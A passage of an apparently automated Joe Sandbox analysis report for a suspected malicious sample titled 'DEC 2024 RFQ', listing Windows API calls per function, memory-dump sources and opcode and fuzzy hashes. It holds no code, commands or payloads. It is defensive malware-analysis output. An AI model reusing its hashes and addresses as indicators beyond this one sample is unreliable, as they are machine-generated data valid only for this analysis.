• CoTaskMemFree.OLE32(00000000), ref: 0008D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0008D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0008D880
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 3a7d1d68155e837648f452b829b6f9cb2d36983f77168dbfce104e36dc593876
• Instruction ID: 588422b9d32aa3441294e0f49a08a40330766a7c38836abd7656d1fd718451d6
• Opcode Fuzzy Hash: 3a7d1d68155e837648f452b829b6f9cb2d36983f77168dbfce104e36dc593876
• Instruction Fuzzy Hash: CEB1EC75A00119AFDB04DFA4C888DAEBBF9FF49314F1485A9E949DB261DB30ED41CB50
APIs
• GetDlgItem.USER32(?,00000001), ref: 0007C283
• GetWindowRect.USER32(00000000,?), ref: 0007C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0007C2F3
• GetDlgItem.USER32(?,00000002), ref: 0007C2FE
• GetWindowRect.USER32(00000000,?), ref: 0007C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0007C364
• GetDlgItem.USER32(?,000003E9), ref: 0007C372
• GetWindowRect.USER32(00000000,?), ref: 0007C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0007C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0007C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0007C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0007C3FE
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 6b8922353f0d8f855916892e2d87fc932c2c7af81a2f60954fe3818d758a6a13
                                                                                                                      • Instruction ID: 391dacafb518b32b2d57ce787031498b0f25f4576f1470e8047f0f8b29a73dbe
                                                                                                                      • Opcode Fuzzy Hash: 6b8922353f0d8f855916892e2d87fc932c2c7af81a2f60954fe3818d758a6a13
                                                                                                                      • Instruction Fuzzy Hash: 75514171B00605AFEB18CFA9DD89EBEBBB6EB88310F14812DF519D7290D7749D008B14
APIs
  • Part of subcall function 00021B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00022036,?,00000000,?,?,?,?,000216CB,00000000,?), ref: 00021B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000220D3
• KillTimer.USER32(-00000001,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0002216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0005BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0005BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0005BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000216CB,00000000,?,?,00021AE2,?,?), ref: 0005BD0A
• DeleteObject.GDI32(00000000), ref: 0005BD1C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: fee7c01317d9e11bc4e7e4d2d4796d8857701b58e4b220799713b02c893f88fb
• Instruction ID: b2a0d973f2a1564154287bc9d637fd11e138d7204ddad763255ec700e361c95e
• Opcode Fuzzy Hash: fee7c01317d9e11bc4e7e4d2d4796d8857701b58e4b220799713b02c893f88fb
• Instruction Fuzzy Hash: BC61C131100A61EFEB359F54EE88B2A77F1FF51707F104928E9826A571CB78A891DB50
APIs
  • Part of subcall function 000225DB: GetWindowLongW.USER32(?,000000EB), ref: 000225EC
• GetSysColor.USER32(0000000F), ref: 000221D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: b8b6a8ff6e85b1a7e00ee5ddf5f9164a573fde4b11621fdaa58482e92a7a3f0d
• Instruction ID: ab432d3845c9644bd535c3ce8b52126f661febd19c6b8220aec2ee6832222849
• Opcode Fuzzy Hash: b8b6a8ff6e85b1a7e00ee5ddf5f9164a573fde4b11621fdaa58482e92a7a3f0d
• Instruction Fuzzy Hash: 4E41A431100550FFEB655FA8EC88BB93BA5EB06331F184365FE659A1E2C7368C46DB21
APIs
• CharLowerBuffW.USER32(?,?,000AF910), ref: 0008A90B
• GetDriveTypeW.KERNEL32(00000061,000D89A0,00000061), ref: 0008A9D5
• _wcscpy.LIBCMT ref: 0008A9FF
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 047e5fd2951bb2064835156aa3ff7fec652b08d568611a0cd7a45a6c1dda7b1f
• Instruction ID: 9183a910c18a894b75fe1c074556277da78e201539924a96c7ce1006912a498b
• Opcode Fuzzy Hash: 047e5fd2951bb2064835156aa3ff7fec652b08d568611a0cd7a45a6c1dda7b1f
• Instruction Fuzzy Hash: C351AC312083019BD714EF14D892AAFB7E5FF86310F14482EF5DA576A2DB319909CB93
APIs
Strings
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: f9174954754d2d61800ca2964580bb334b4ab40151296abc98daee8e17d99849
• Instruction ID: 77e12d51331f01c938294822f6708958568f91b9a25a8fc8cd7e323100eb88f1
• Opcode Fuzzy Hash: f9174954754d2d61800ca2964580bb334b4ab40151296abc98daee8e17d99849
• Instruction Fuzzy Hash: AB41C771900616AFDB24DF34DC42EBA77E8FF45300F24447EEA49DB292EE35A9458B10
APIs
• _memset.LIBCMT ref: 000A716A
• CreateMenu.USER32 ref: 000A7185
• SetMenu.USER32(?,00000000), ref: 000A7194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000A7221
• IsMenu.USER32(?), ref: 000A7237
• CreatePopupMenu.USER32 ref: 000A7241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000A726E
• DrawMenuBar.USER32 ref: 000A7276
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 3fd001b3682b9bfea3df20f743188109f81991b67a7d9b448342c737171019ac
• Instruction ID: 7befb6e5221362a9f4a7d907a67c5d6e15565c9b0f5beeeb37ac294c94d3b181
• Opcode Fuzzy Hash: 3fd001b3682b9bfea3df20f743188109f81991b67a7d9b448342c737171019ac
• Instruction Fuzzy Hash: 1C412574A01605EFEB20DFA4DD84BAA7BF5FB4A310F144428FA49A7361D735A910CB90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 000A755E
• CreateCompatibleDC.GDI32(00000000), ref: 000A7565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 000A7578
• SelectObject.GDI32(00000000,00000000), ref: 000A7580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 000A758B
• DeleteDC.GDI32(00000000), ref: 000A7594
• GetWindowLongW.USER32(?,000000EC), ref: 000A759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 000A75B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 000A75BE
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: eacfef9c9a809bf063cdb7c10ef2705b682978113c75bbcd26c92a9c0f396125
• Instruction ID: d45b7d673d1fd9d0728b8dfe1eaa135963af705545e9d69672539f35bbf4357b
• Opcode Fuzzy Hash: eacfef9c9a809bf063cdb7c10ef2705b682978113c75bbcd26c92a9c0f396125
• Instruction Fuzzy Hash: 93316F32504615BBEF129FB4DC08FEB3BA9FF0A360F114224FA59960A1C775D811DBA4
APIs
• _memset.LIBCMT ref: 00046E3E
  • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
• __gmtime64_s.LIBCMT ref: 00046ED7
• __gmtime64_s.LIBCMT ref: 00046F0D
• __gmtime64_s.LIBCMT ref: 00046F2A
• __allrem.LIBCMT ref: 00046F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00046F9C
• __allrem.LIBCMT ref: 00046FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00046FD1
• __allrem.LIBCMT ref: 00046FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00047006
• __invoke_watson.LIBCMT ref: 00047077
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 384356119-0
                                                                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                      • Instruction ID: 5d74dd6edc5dc58cfc5cdcc09d5897bf96724b0b9c3ab4c961aeafc7a22e6d3f
                                                                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                      • Instruction Fuzzy Hash: 0E7126F2A00716EBD714AE69DC41BABB3E8AF01364F108639F814D7282F771DD448B95
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082542
                                                                                                                      • GetMenuItemInfoW.USER32(000E5890,000000FF,00000000,00000030), ref: 000825A3
                                                                                                                      • SetMenuItemInfoW.USER32(000E5890,00000004,00000000,00000030), ref: 000825D9
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 000825EB
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0008262F
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0008264B
                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00082675
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000826BA
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00082700
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00082714
                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00082735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4176008265-0
                                                                                                                      • Opcode ID: 6d89c901bbc820b47cdd66dab045974fff2eb1e7ce22ce0f9b22371c0c34b128
                                                                                                                      • Instruction ID: 8c0292d77b31e1cf6233d61a722085cb4668c7f15e18f8a069ef911db5c8a2f6
                                                                                                                      • Opcode Fuzzy Hash: 6d89c901bbc820b47cdd66dab045974fff2eb1e7ce22ce0f9b22371c0c34b128
                                                                                                                      • Instruction Fuzzy Hash: 0A61C27090464AAFEF21EFA4DD88DBE7BF8FB02304F140459E982A7251E735AD15DB21
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000A6FA5
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000A6FA8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000A6FCC
                                                                                                                      • _memset.LIBCMT ref: 000A6FDD
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000A6FEF
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000A7067
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 1542a8801ec09f533e7237d6c314aff6c61224ed9f7215e340e0bbb4f6eef5af
                                                                                                                      • Instruction ID: eaa59843e7dfaba1816f8ad810ff06851db29f53e6137c063b997acaf6b650ee
                                                                                                                      • Opcode Fuzzy Hash: 1542a8801ec09f533e7237d6c314aff6c61224ed9f7215e340e0bbb4f6eef5af
                                                                                                                      • Instruction Fuzzy Hash: 45618C75900248EFDB10DFA8CC81EEE77F8EB0A714F144169FA14AB2A2C775AD41CB90
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00076BBF
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00076C18
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00076C2A
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00076C4A
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00076C9D
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00076CB1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00076CC6
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00076CD3
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00076CDC
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00076CEE
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00076CF9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 3fce8155f2203476b0af670500e9d77a2e3e01c0e20cde02500399005f3198f8
                                                                                                                      • Instruction ID: 277ef416005403f4fa78b5f59966aae1d348d754036c2ded82e70c590961fc2f
                                                                                                                      • Opcode Fuzzy Hash: 3fce8155f2203476b0af670500e9d77a2e3e01c0e20cde02500399005f3198f8
                                                                                                                      • Instruction Fuzzy Hash: 8A415135E005199FDF00DFA4D8449EEBBB9EF09350F00C069E956E7261DB35A945CB94
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • CoInitialize.OLE32 ref: 00098403
                                                                                                                      • CoUninitialize.OLE32 ref: 0009840E
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,000B2BEC,?), ref: 0009846E
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 000984E1
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0009857B
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000985DC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: 82949cd14ac99527fdf3ee53fe8abbd00d05744601d63b5e811d21fe82c86afe
                                                                                                                      • Instruction ID: fe3da5394be4c3d1c3790e194bfeef456d05c382c23bfd95ce3e4cca8285c39c
                                                                                                                      • Opcode Fuzzy Hash: 82949cd14ac99527fdf3ee53fe8abbd00d05744601d63b5e811d21fe82c86afe
                                                                                                                      • Instruction Fuzzy Hash: 3661BE706087129FDB10DF64C848FAEB7E8AF4A754F048419F9859B3A1CB74ED48DB92
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00095793
                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 000957D8
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 000957E4
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 000957F2
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00095862
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00095878
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 000958ED
                                                                                                                      • WSACleanup.WSOCK32 ref: 000958F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 1e0d9dcac45a1de262935077d72a46eb45645bf19cb629f7f60cf966b169a9dd
                                                                                                                      • Instruction ID: b75f95e162a665a3c562588fa0d94afe5fbe6b6d2c93ae8e72a09ae2a8caa23f
                                                                                                                      • Opcode Fuzzy Hash: 1e0d9dcac45a1de262935077d72a46eb45645bf19cb629f7f60cf966b169a9dd
                                                                                                                      • Instruction Fuzzy Hash: 9851C131604B01DFEB21EF65DC45B6AB7E4EF45711F048929F996EB2A1DB30E800EB51
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008B4D0
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0008B546
                                                                                                                      • GetLastError.KERNEL32 ref: 0008B550
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0008B5BD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: c981b644df018fd04182b5b0a4e744bce285b15e5995f86b0b4abcb64dc140f8
                                                                                                                      • Instruction ID: aff509f6adad527067d0efdb9537ca12ce3eb5bd8975b17a0ca7b9f69b0a061f
                                                                                                                      • Opcode Fuzzy Hash: c981b644df018fd04182b5b0a4e744bce285b15e5995f86b0b4abcb64dc140f8
                                                                                                                      • Instruction Fuzzy Hash: DD31A135A00605DFDB20FB68D845FBE7BB4FF09310F108126E645DB292DB709A41CB91
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00079014
                                                                                                                      • GetDlgCtrlID.USER32 ref: 0007901F
                                                                                                                      • GetParent.USER32 ref: 0007903B
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0007903E
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00079047
                                                                                                                      • GetParent.USER32(?), ref: 00079063
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00079066
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: d11fdafa4f7ef3cb94255cb9f81b4134ade5376bda373b175823a31cde5938d9
                                                                                                                      • Instruction ID: 6ab239c37615e3cc53d3640515735c14b8fcc278bfcdf2b9d4a6b1eb5d056e50
                                                                                                                      • Opcode Fuzzy Hash: d11fdafa4f7ef3cb94255cb9f81b4134ade5376bda373b175823a31cde5938d9
                                                                                                                      • Instruction Fuzzy Hash: 0D21C170E00209BFDF14ABA0CC85EFEBBB8EF4A310F104116F925972A2DB795815DB64
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000790FD
                                                                                                                      • GetDlgCtrlID.USER32 ref: 00079108
                                                                                                                      • GetParent.USER32 ref: 00079124
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00079127
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00079130
                                                                                                                      • GetParent.USER32(?), ref: 0007914C
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0007914F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
